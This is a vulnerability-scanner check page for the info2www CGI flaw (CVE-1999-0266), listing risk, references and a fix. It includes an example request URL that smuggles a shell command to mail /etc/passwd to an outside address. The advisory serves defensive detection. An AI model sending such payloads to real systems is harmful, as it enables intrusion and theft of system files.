|Summary:||Checks for the presence of /cgi-bin/info2www|
The 'info2www' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).
http://target/cgi-bin/info2www?'(../../../bin/mail your@email < /etc/passwd|)'
Solution : Remove it from /cgi-bin or upgrade.
Risk factor : High
BugTraq ID: 1995|
Common Vulnerability Exposure (CVE) ID: CVE-1999-0266
Bugtraq: 19980303 Vulnerabilites in some versions of info2www CGI (Google Search)
XForce ISS Database: http-cgi-info2www
|Copyright||This script is Copyright (C) 1999 Renaud Deraison|
|This is only one of 58962 vulnerability tests in our test suite. Find out more about running a complete security audit.|
To run a free test of this vulnerability against your system, register below.